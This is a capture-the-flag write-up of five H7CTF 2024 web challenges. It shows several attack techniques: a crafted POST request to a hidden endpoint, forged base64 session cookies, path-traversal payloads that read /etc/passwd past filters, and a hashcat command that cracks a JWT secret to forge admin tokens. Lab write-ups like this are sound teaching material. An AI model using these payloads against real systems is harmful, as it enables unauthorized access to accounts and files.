CTF Writeups
2024
H7CTF
H7CTF - Web Challenges
Published by  Josan26th Sep 2024
# web# directory-traversal# idor# jwt# path-traversal
Loading views...

No Paste

image.png

  • Checking the website, we can see that the input is disabled

image.png

  • Checking the source, we get script.js analyzing it
const _2f7956 = document.getElementById('challengeInput').value;
fetch('/submit?input=' + encodeURIComponent(_2f7956), {'method': 'POST'})
  .then(_101da1 => _101da1.json())
  .then(_5c2193 => {
    const _ae2c45 = document.getElementById('result');
    _5c2193.success ? _ae2c45.textContent = 'Flag: ' + _5c2193.flag : _ae2c45.textContent = _5c2193.message;
  })
  .catch(_3c7f8d => {
    console.error('Error:', _3c7f8d);
  });
  
  • We are able to see if we send a POST request with /submit?input= and input bypass123

image.png

  • Constructing a request accordingly using burp
POST /submit?input=bypass123 HTTP/2
Host: paste.h7tex.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
  • Once we send the request, we obtained the flag

image.png

Code Breaker

image.png

  • Checking the website, there is a login page

image.png

  • There is also an admin page, in endpoint /admin

image.png

  • Logging in with the mentioned credentials

image.png

  • Analyzing the requests and responses in burp, we are able to see that the session id is just the base64 encoded username followed by some random digits. Example, in this case, user1 is the username and 738 are random digits

image.png

  • Changing the user1 to admin and trying different random digits, also changing the endpoint to /admin
  • We are able to get the right admin cookie in the response

image.png

  • Now changing the cookie to the intended value, we get the flag

image.png

NewsLeaks

image.png

  • Checking the website, we are able to find different news paper articles

image.png

  • Analyzing the requests we are able to see file parameter, so it could be Local File Inclusion (LFI)

image.png

  • We can use different payloads from online if you are not aware of performing LFI You can bruteforce the payloads from here (opens in a new tab)
  • We are gonna try the manual way, usually the web root directory will be in /var/www/html So keeping that in mind and trying, ../../../etc/passwd

image.png

  • We are able to see, that its filtering some / and .
  • Trying to double it and see, example: ....//....//....//etc/passwd

image.png

  • We can see 3 dots are reflected, so removing 1 dot, the final payload, ...//...//...//etc/passwd

image.png

  • YAAYYYYYY but wait, where is the flag, our payload bypassed the filter, but we still need to figure out the number of directories. Thinking, or trying adding on ...// understanding, there is /news directory, so we need to go back one extra time

image.png

  • We got the flag

Paper Chase

image.png

  • This is similar to the previous one, but with better filters. REALLY? LOL!

image.png

  • Analyzing the requests we are able to see file parameter, so it could be Local File Inclusion (LFI)
  • Trying the same payload, that we found. We are able to see, when there is 2 dots it is converting to #

image.png

  • Trying different approaches, so succeeded file: So trying it and extracting the contents
file:///etc/passwd
  • We got the flag

image.png

Pizza

image.png

  • I was the only guy to solve this challenge, NOT A FLEX :)

image.png

  • Registering, and logging in as a new user

image.png

  • Analyzing the requests and responses in burp, we get JWT

image.png

  • Using jwt.io to decode, changing the isAdmin to true and sending the token

image.png

  • But when we submit the cookie, its saying invalid token

image.png

  • Trying to crack the secret using hashcat using jwt.secrets.list
$ hashcat -a 0 -m 16500 <YOUR-JWT> /path/to/jwt.secrets.list**

image.png

  • Signing using the secret key, and changing the cookie

image.png

  • Adding an item to cart, and opening cart
  • Placing the order

image.png

  • Entering the information

image.png

  • We get the order details

image.png

  • Analyzing the requests and responses in burp, we are able to see the token of the order

image.png

  • Also while querying the order status there is a endpoint going /api/order/SUQ1

image.png

  • The endpoint SUQ1 is base64 encoded

image.png

  • Modifying the base64 encoding to ID0 which is SUQw

image.png

  • Trying to query the order, with the generated JWT
  • We can also change the cookie token in cookie editor

image.png

  • We got the flag

image.png